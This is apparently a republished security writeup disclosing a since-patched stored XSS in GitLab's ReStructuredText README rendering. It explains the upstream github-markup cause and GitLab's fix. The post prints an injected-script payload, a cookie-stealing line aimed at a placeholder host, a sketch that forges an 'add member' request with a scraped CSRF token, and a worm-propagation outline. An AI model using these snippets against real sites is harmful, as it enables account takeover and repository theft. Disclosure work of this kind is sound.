Published on 05/15/2024 14:25 by Ritz
…or how I stubbed my toe on the keys to a few dozen kingdoms
NOTE: this content originally appeared on the Taos blog
I’m authoring this security writeup in ReStructuredText. An odd way to start this off, I know. But bear with me: I promise that ReStructuredText is relevant to a recently patched major vulnerability I uncovered in GitLab. Hopefully that’s a strange enough sentence to capture your attention. If not, I promise cookies 35% of the way through this document.
ReST up
ReStructuredText is my favorite lightweight plaintext markup language, and I tend to prefer it over the much more popular Markdown on the basis of its greater standardization and the greater power of its base feature set. In addition it’s also the primary documentation parsing system for the Python community, making it an easy choice to learn for Python coders such as myself.
Because of this I have often used the Pelican static site generator to build websites. It is a tool which takes ReStructuredText as input and outputs static HTML websites. These websites are fast, secure, and simple to administer. I turned to Pelican again when creating a site for my wife’s new webcomic, herpaderp.party. It was during the process of creating this site that I stumbled across something that I can only reasonably describe as “kind of a big deal.”
The glitch
In the process of creating the feeds page for herpaderp.party, I found it necessary to have recourse to the ReStructuredText raw directive in order to force raw HTML into a page.
The pre-parsed code looks like this:
.. raw:: html

   <form method='post' action='https://blogtrottr.com'>
     Your email: <input type='text' name='btr_email' />
     <input type='hidden' name='btr_url' value='https://herpaderp.party/feeds/strips.atom.xml' />
     <input type='hidden' name='schedule_type' value='6' />
     <input type='submit' value='Follow this feed via email' />
   </form>
   <br />
This produces the output that you see on the above page, and is a relatively clean solution to the problem that I was presented with. What shocked me, however, was the fact that after I had committed the code and pushed it to GitLab the raw HTML code I had inserted was visible, not as code, but as the button that the code itself defines.
All of the major web-based SCM platforms (GitHub, Bitbucket, GitLab and Phabricator) support previewing the rendered text of a number of popular markup formats (such as ReStructuredText, Markdown, AsciiDoc, etc.). At this point it’s very near to being a required feature in the space. It’s this feature that enables the richly formatted README files that people have come to expect from the web frontends of their SCM solutions. However, with the ability to insert raw HTML into the output comes the potential to rewrite the website itself as it’s presented to the user. This was when my concern started to bubble to the surface.
The problem
While Pelican rendering my raw directive is totally acceptable (it’s my site with my content parsed by me), for GitLab to render this HTML is another matter entirely. As a general rule a website should never allow user-supplied HTML to run on the site, especially without sanitization. The reasons for this were amply demonstrated by the Samy worm, but this writeup may serve as a refresher on the dangers.
One of the first steps in determining the seriousness of the issue was to attempt to issue basic JavaScript calls from within the presented content. The most straightforward way to do this is to try to pop up a message box using the alert() call, like so:
<script type='text/javascript'>
alert('This is an alert to test if this site may be pwnable');
</script>
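Worth noting: dropped into a .rst file on its own, that script would just be escaped and displayed as text. To actually fire when GitLab renders the file, it has to ride inside the same raw directive shown earlier. A sketch of what a malicious README.rst would contain (same structure as my feeds-page snippet, with the script as the payload):

.. raw:: html

   <script type='text/javascript'>
     alert('This is an alert to test if this site may be pwnable');
   </script>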
On discovering that I could, indeed, inject JavaScript into a GitLab website that would be triggered whenever I viewed the offending file (a project’s README.rst file in this case), the next question to ask was “can users viewing this page have their accounts taken over?” The answer to that question is a resounding “kinda, but functionally yes.”
Cookies are delicious, except when you can’t eat them…
In general GitLab has done a good job of ensuring that their application is secure. This is good because I regularly recommend it to clients and friends (and will continue to do so) and use it almost exclusively to host my code. I’m a fan. As a result of them having done a good job, they’ve made it so that you cannot just “grab” the user’s session cookie and send it away to a remote location.
If we had been able to perform that operation, it would have been trivial to fully impersonate every single user that viewed the README file of the project. This is as dangerous as a standard phishing attack; however, from the user’s perspective it has none of the giveaways: it comes from a trusted URL and displays no popups asking for permission or access. So we’re very lucky that such an attack is not permitted. Unfortunately, however, when you are executing in the browser with code originating from the website that you want to perform actions on, this protection becomes immaterial.
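To make that concrete, here’s the smash-and-grab that doesn’t work. The session cookie is flagged HttpOnly (my inference as to why the grab fails; the flag makes a cookie invisible to JavaScript), so the classic exfiltration sketch below comes up empty-handed:

// The classic cookie grab: smuggle document.cookie out via an image request
// to a server the attacker controls (evil.example is a placeholder).
// Against GitLab this yields nothing useful, because the HttpOnly session
// cookie never appears in document.cookie.
new Image().src = 'https://evil.example/steal?c=' +
    encodeURIComponent(document.cookie);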
AJAX the great
AJAX (Asynchronous JavaScript and XML) is the technique that powers the vast majority of modern websites. Fundamentally, AJAX is what allows pages to fetch and display new content without requiring the user to refresh the page. Your Facebook and Twitter feeds, Google Maps, practically every popular website makes use of AJAX extensively.
At its core, AJAX allows a website to request additional content by means of JavaScript calls. Because I can inject JavaScript into the README page of a project, I now have the power to make the same AJAX requests as the application itself, with all of the privileges of the user viewing the README. Using these calls I created the proof of concept that I submitted to GitLab’s security team.
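As a concrete illustration (the dashboard path here is an assumption for the sketch, not lifted from my actual POC), an injected script can fetch pages as the victim like so:

// Same-origin request: the browser attaches the victim's session cookie
// automatically, and no CORS rules or permission prompts get in the way.
var xhr = new XMLHttpRequest();
xhr.open('GET', '/dashboard/projects', true);
xhr.onload = function () {
  // responseText now holds the victim's dashboard HTML, including links to
  // every project they can access, ready to be scraped.
  console.log('fetched ' + xhr.responseText.length + ' bytes as the victim');
};
xhr.send();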
Anatomy of a POC
Now, I’m sure “real” researchers are cringing in pain at my awful, cobbled-together JavaScript. And make no mistake, I don’t consider myself to be a pro. In fact this is my first JavaScript ever. The reason I’m showcasing it is to prove how simple it can be to craft an incredibly dangerous attack given even mediocre skill, under the right conditions.
The POC exploit first makes an HTTP GET request for the user’s dashboard page and indexes the entire list of projects to which they have access. It then accesses the user access management page for each of those projects (more GET requests) and retrieves a security token from the user management forms on those pages. This token is required for the final step, and is designed to help mitigate CSRF (cross-site request forgery). Unfortunately in this case our attack is not cross-site at all, and therefore we can simply ask for this token (just as the user’s normal application usage would).
The final, and most critical, step of a POC is the actual exploit, the “what” that occurs after the “how”. In this case the final step is to make an HTTP POST request against the API endpoint for user management to add a new user to the project with full permissions:
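A minimal sketch of those last two steps (the members-page path, the form field names, and the access-level value are illustrative guesses for this writeup, not verified GitLab internals or the literal code from my POC):

// Grab the anti-CSRF token from the project's member-management form, then
// replay it in a forged "add member" POST. Synchronous XHR keeps the sketch
// short; the real exploit would be asynchronous.
function takeOverProject(projectPath) {
  var get = new XMLHttpRequest();
  get.open('GET', projectPath + '/project_members', false);
  get.send();

  // Same-origin means we can simply read the token out of the returned
  // page, exactly as GitLab's own JavaScript would.
  var doc = new DOMParser().parseFromString(get.responseText, 'text/html');
  var token = doc.querySelector('input[name="authenticity_token"]').value;

  // Add the attacker (user id 1234 here) with full permissions;
  // access_level 40 corresponded to "Master" at the time.
  var post = new XMLHttpRequest();
  post.open('POST', projectPath + '/project_members', false);
  post.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
  post.send('authenticity_token=' + encodeURIComponent(token) +
            '&user_ids=1234&access_level=40');
}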
The simple attack…extended
The ability to execute drive-by requests on behalf of a user is dangerous on a fundamental level, but on a platform like GitLab the problem expands because it becomes possible to make the exploit self-replicating. In short, it can be extended into a worm.
If the attacker, once granted master access to a victim’s projects, then adds the exploit code to the README of each of those projects, the payload spreads to more projects as more users view them. Depending on the viewing rate it would rapidly become resident in the majority of the projects on the platform. This entire process could be automated, of course. Additionally, it’s important to remember that access to private projects would be possible in this way, so all repositories that users might have considered “secure” would suddenly be exposed. Secret keys, credentials, and proprietary code would be available to the attacker.
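In pseudo-outline the whole loop is depressingly small. Here listProjects() and appendPayloadToReadme() are hypothetical helpers, standing in for the dashboard-scraping described earlier and for a commit made through GitLab’s own web endpoints, respectively:

// Self-replication loop: every project the victim can touch gets both an
// attacker account and a freshly infected README.
listProjects().forEach(function (projectPath) {
  takeOverProject(projectPath);       // the POC step sketched above
  appendPayloadToReadme(projectPath); // re-plant the exploit for the next viewer
});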
It’s therefore clear that even this small parsing vulnerability can, in the right circumstances, become a very serious security issue. But how did it happen in the first place? How did GitLab come to be vulnerable to this attack?
The bug is always upstream
It turns out that GitLab’s parsing of ReStructuredText documents is performed by a Ruby gem called gitlab-markup. This gem was forked from an open-source gem created by GitHub, github-markup. GitLab uses this code to run the actual Python program (docutils) which performs the rendering.
The github-markup gem performs this rendering via a wrapper script called rest2html. rest2html explicitly allows raw directives, thanks to code added in commit 68557d2 which flipped this switch from false to true (the commit message rather ironically reads “enable raw html”). I’ve already opened issue 981 with that project, but have not yet received a response as to why this was not considered a risk. From my rudimentary testing GitHub appears to block raw:: html entirely, so it’s possible this may no longer be the code that they run on their systems. Or perhaps they perform some additional sanitization later on.
What about everyone else?
Although GitHub may be protecting itself in a satisfactory manner, the vast number of downstream projects that use this code are still of concern. A full 708 repositories on GitHub alone are listed as dependent, but there may be many others that are not hosted on GitHub, or whose use of this upstream module is not caught by GitHub’s dependency graph.
For all of these applications it is vital that their authors consider carefully whether they are using this code in a safe manner. Is it rendering user-supplied content back to other users, and if so, is that output being sanitized before use? My recommendation would be to heed the warnings of the authors of docutils and disable raw entirely from running in any context on user-supplied data. It is, by the admission of its own documentation, a security risk. Heck, if you’re foolish enough to enable raw file or URL access you can actually access files and URLs from the system on which the parser is running. Terrifying.
GitLab’s response
GitLab is to be lauded for their incredibly professional and speedy response. They were back to me in less than 24 hours after initial disclosure and had a provisional patch to me less than 24 hours after that. The vulnerability was publicly announced on 2017/01/10 with a patch that disables the raw:: html directive entirely.
It is a sad but inescapable truism that code will have bugs; what’s important is that we find them, fix them, and learn to keep ourselves safer over time. Speaking of that…
Lessons to learn
In inheriting code from an upstream source it is critical to understand that you also inherit that code’s perception of its own security model within its environment. github-markup may be secure within the GitHub and GitHub Enterprise software stack, but it is not guaranteed to be secure outside of it. The usage of a library by a well-known and generally “considered secure” vendor does not mean that you can incorporate it into your product without careful evaluation.
As we develop software we must not only inspect and test the code (both that which we write and that which we inherit), but also the application after all of the code has been assembled and installed. While it’s obviously infeasible to validate every line of code in an operating system just to write an app that runs atop it, there is no substitute for aggressive testing of your application once it has been stood up. Qualified professionals (did you notice that we’re on the Taos blog?) can help you discover the chinks in your armor before somebody nefarious starts holding your users for ransom and damaging your reputation.
Thanks to
- Taos: for giving me a good place to talk about this
- GitLab: for being so much more professional than most upon being informed of a flaw
- DC562 (My Long Beach Defcon Group): for helping me learn how to hack properly
- My ex-wife: for putting up with my perpetual lack of sleep while I fix broken pieces of computer